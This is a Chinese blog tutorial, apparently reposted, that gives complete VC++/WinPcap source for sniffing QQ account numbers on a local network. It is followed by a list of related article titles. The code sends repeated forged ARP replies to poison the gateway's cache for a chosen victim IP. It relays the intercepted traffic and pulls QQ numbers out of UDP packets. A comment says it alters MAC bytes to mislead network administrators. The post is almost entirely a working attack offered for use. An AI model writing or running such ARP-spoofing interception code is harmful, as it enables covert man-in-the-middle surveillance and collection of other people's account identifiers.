VC++在局域网基于winpcap实现QQ号码IP嗅探
来源:互联网 发布:iphone6白苹果修复数据 编辑:程序博客网 时间:2024/04/29 17:46
在局域网上,理论上所有传输的数据会经过每个机器,所以这就为我们嗅探提供了遍历。、
下面我来编程实现QQ号码的IP嗅探。
#include "stdafx.h"#include "pcap.h"#include <stdio.h>#include "Iphlpapi.h"#include "protocol.h"#pragma comment(lib,"wpcap.lib")#pragma comment(lib, "Iphlpapi.lib")#pragma comment(lib,"wsock32.lib")#define PCAP_OPENFLAG_PROMISCUOUS 1DWORD dwMyIp,dwGateIp,dwSubnet,dwDstIp;UCHAR uMyMac[6],uGateMac[6],uDstMac[6];pcap_t *adhandle;int nCount = 0;//用于执行三次获取网关MAC的操作bool bGateMac = true;bool bDstMac = true;void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]);int SendPacket(char *pBuffer, int nLen);/* 每次捕获到数据包时,libpcap都会自动调用这个回调函数 */void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data){ ETHeader *pETHdr = (ETHeader *)pkt_data;if(ntohs(pETHdr->type) == ETH_TYPE_ARP){if(header->len < sizeof(ArpPacket)) return;ARPHeader *pArpHdr = (ARPHeader *)((char *)pkt_data+sizeof(ETHeader));if(ntohs(pArpHdr->opcode) == ARPOP_REPLY){if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwGateIp && bGateMac){if(nCount == 0){memcpy(uGateMac,pArpHdr->smac,6);nCount ++;}else if(nCount == 3)//完成获取网关MAC{bGateMac = false;return;}else{if(!memcmp(uGateMac,pArpHdr->smac,6)){nCount ++;}else{nCount = 0;}}SendArpRequest(dwGateIp,dwMyIp,uMyMac);}if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwDstIp && bDstMac){memcpy(uDstMac,pArpHdr->smac,6);bDstMac = false;}}}if(ntohs(pETHdr->type) == ETH_TYPE_IP){IpHeader *pIpHdr = (IpHeader *)((char*)pkt_data+sizeof(ETHeader));if(pIpHdr->Protocol == PROTOCOL_UDP){if(header->len < sizeof(ETHeader) + sizeof(IpHeader) + sizeof(UdpHeader)) return;UdpHeader *pUdpHdr = (UdpHeader *)((char*)pIpHdr+sizeof(IpHeader));if(ntohs(pUdpHdr->SrcPort) == 8000){QQHeader *pQQHdr = (QQHeader *)((char*)pUdpHdr+sizeof(UdpHeader));if(pQQHdr->Flag != 0x02) return;//不是qq数据包UCHAR uQQ[4];memcpy(uQQ,pQQHdr->Data,4);DWORD dwQQ = 0;for(int i=0;i<4;i++){dwQQ = dwQQ*256+uQQ[i];}printf("找到IP:%s的QQ号:%u\n",inet_ntoa(*(in_addr*)&pIpHdr->DstAddr),dwQQ);}}if(pIpHdr->DstAddr == dwDstIp && memcmp(pETHdr->dhost,uDstMac,6))//目的IP为要嗅探的IP,但是目的MAC不是对方的MAC{pETHdr->shost[5] ++;//源MAC不能设为网关MAC,否则会出现交换机欺骗,从而其它主机也无法上网memcpy(pETHdr->dhost,uDstMac,6);SendPacket((char*)pkt_data,header->len);}}}int SendPacket(char *pBuffer, int nLen){if(pcap_sendpacket(adhandle,(UCHAR *)pBuffer,nLen)) return 0;return 1;}void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]){ArpPacket *pArpPacket = new ArpPacket;for(int i =0;i<6;i++)pArpPacket->eth.dhost[i] = 0xFF;memcpy(pArpPacket->eth.shost,uSrcMac,6);pArpPacket->eth.type = ntohs(ETH_TYPE_ARP);pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER);pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP);pArpPacket->arp.maclen = 6;pArpPacket->arp.iplen = 4;pArpPacket->arp.opcode = ntohs(ARPOP_REQUEST);memcpy(pArpPacket->arp.smac,uSrcMac,6);pArpPacket->arp.saddr = dwSrcIP;memset(pArpPacket->arp.dmac,0,6);pArpPacket->arp.daddr = dwDesIP;SendPacket((char*)pArpPacket,sizeof(ArpPacket));delete pArpPacket;}void SendArpReply(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uDesMac[], UCHAR uSrcMac[]){ArpPacket *pArpPacket = new ArpPacket;memcpy(pArpPacket->eth.dhost,uDesMac,6);memcpy(pArpPacket->eth.shost,uSrcMac,6);pArpPacket->eth.type = ntohs(ETH_TYPE_ARP);pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER);pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP);pArpPacket->arp.maclen = 6;pArpPacket->arp.iplen = 4;pArpPacket->arp.opcode = ntohs(ARPOP_REPLY);memcpy(pArpPacket->arp.smac,uSrcMac,6);pArpPacket->arp.saddr = dwSrcIP;memcpy(pArpPacket->arp.dmac,uDesMac,6);pArpPacket->arp.daddr = dwDesIP;SendPacket((char*)pArpPacket,sizeof(ArpPacket));delete pArpPacket;}int WINAPI MyThread(LPVOID Param){//Sleep(100);SendArpRequest(dwGateIp,dwMyIp,uMyMac);while(1){if(bGateMac){::Sleep(100);continue;}break;}printf("网关MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uGateMac[0],uGateMac[1],uGateMac[2],uGateMac[3],uGateMac[4],uGateMac[5]);printf("输入要嗅探的IP地址:");char ip[20];scanf("%s",ip);dwDstIp = inet_addr(ip);SendArpRequest(dwDstIp,dwMyIp,uMyMac);while(1){if(bDstMac){::Sleep(100);continue;}break;}printf("目标MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uDstMac[0],uDstMac[1],uDstMac[2],uDstMac[3],uDstMac[4],uDstMac[5]);printf("输入每秒发送欺骗包的个数:1-50\n");int nSpeed;scanf("%d",&nSpeed);UCHAR uMac[6]; uMac[0] = uDstMac[0];uMac[1] = uDstMac[1];uMac[2] = uDstMac[3];uMac[3] = uDstMac[2];//交换MAC的第三和第四个字节,迷惑管理员uMac[4] = uDstMac[4];uMac[5] = uDstMac[5];while(1){SendArpReply(dwGateIp,inet_addr(ip),uGateMac,uMac);Sleep(1000/nSpeed);}return 0;}int GetNetConfig(DWORD dwIp){PIP_ADAPTER_INFO pAdapterInfo = NULL;ULONG ulLen = 0;// 为适配器结构申请内存::GetAdaptersInfo(pAdapterInfo,&ulLen);pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);// 取得本地适配器结构信息if(::GetAdaptersInfo(pAdapterInfo,&ulLen) == ERROR_SUCCESS){while(pAdapterInfo != NULL){if(dwIp == inet_addr(pAdapterInfo->IpAddressList.IpAddress.String)){dwMyIp = dwIp;memcpy(uMyMac,pAdapterInfo->Address,6);dwSubnet = inet_addr(pAdapterInfo->IpAddressList.IpMask.String);dwGateIp = inet_addr(pAdapterInfo->GatewayList.IpAddress.String);//CEther::SetGateWayAddr(inet_addr(pAdapterInfo->GatewayList.IpAddress.String),"");printf("本机IP地址为:%s\n本机MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n网关IP地址为:%s\n",pAdapterInfo->IpAddressList.IpAddress.String,uMyMac[0],uMyMac[1],uMyMac[2],uMyMac[3],uMyMac[4],uMyMac[5],pAdapterInfo->GatewayList.IpAddress.String);return 1;}pAdapterInfo = pAdapterInfo->Next;}return 0;}return -1;}int main(int argc, char* argv[]){pcap_if_t *alldevs; pcap_if_t *d; int i = 0; char errbuf[PCAP_ERRBUF_SIZE]; /* Retrieve the device list from the local machine*/ if (pcap_findalldevs(&alldevs, errbuf) == -1) { printf("Error in pcap_findalldevs_ex: %s\n", errbuf); exit(1); } /* Print the list */ for (d = alldevs; d != NULL; d = d->next) { /* Print the device’s name */ printf("%d. %s", ++ i, d->name); /* Print the device’s dscription */ if (d->description) { printf("(%s)\n", d->description); } else { printf("(No description available)\n"); } } if (i == 0) { printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return -1; } printf("Enter the interface number (1-%d):",i);int nIdx; scanf("%d", &nIdx); if(nIdx < 1 || nIdx > i) { printf("\nInterface number out of range.\n"); /* 释放设备列表 */ pcap_freealldevs(alldevs); return -1; } /* 跳转到选中的适配器 */ for(d=alldevs, i=0; i< nIdx-1 ;d=d->next, i++); /* 打开设备 */ if((adhandle= pcap_open_live(d->name, // 设备名65536, // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容PCAP_OPENFLAG_PROMISCUOUS, // 混杂模式10, // 读取超时时间errbuf // 错误缓冲池)) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); /* 释放设备列表 */ pcap_freealldevs(alldevs); return -1; } printf("\nlistening on %s...\n", d->description); GetNetConfig(((sockaddr_in *)(d->addresses->addr))->sin_addr.S_un.S_addr); /* 释放设备列表 */ pcap_freealldevs(alldevs); ::CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)MyThread,NULL,0,0); /* 开始捕获 */ pcap_loop(adhandle, 0, packet_handler, NULL);return 0;}
- VC++在局域网基于winpcap实现QQ号码IP嗅探
- winpcap编程之局域网QQ号码嗅探
- 用VC在局域网实现IP多播通信
- VC++基于winpcap实现数据包分析
- VC++实现局域网嗅探QQ号
- VC++实现局域网嗅探QQ号
- VC++基于winpcap实现ARP攻击禁止访问相关网站
- QQ聊天功能在局域网中的实现
- 局域网内QQ号码的嗅探
- 基于WinpCap的局域网ARP工具
- WinPcap在无线局域网下的使用
- WinPcap在无线局域网下的使用
- 使用python来嗅探局域网内的QQ号码
- 用Visual C++语言在局域网实现IP多播
- 用Visual C++在局域网实现IP多播
- 用Visual C++在局域网实现IP多播
- 用Visual C++语言在局域网实现IP多播
- 基于Tcp/ip Scoket套接字实现类似 QQ聊天
- 线程同步及单例类
- 算法-将矩阵逆时针旋转90度
- 平衡二叉树
- c/c++在线编译器
- android编写Service入门
- VC++在局域网基于winpcap实现QQ号码IP嗅探
- java 线程同步 临时资源
- HDU 2087 剪布条
- 终于开通自己的博客啦
- 面试谈薪牢记四句话
- android UI进阶之实现listview的分页加载 处理加载完毕
- 在防火墙的例外中注册程序(Windows7和XP)
- 使用BusyBox制作根文件系统
- 用WINRAR将多个SWF文件压缩成一个EXE文件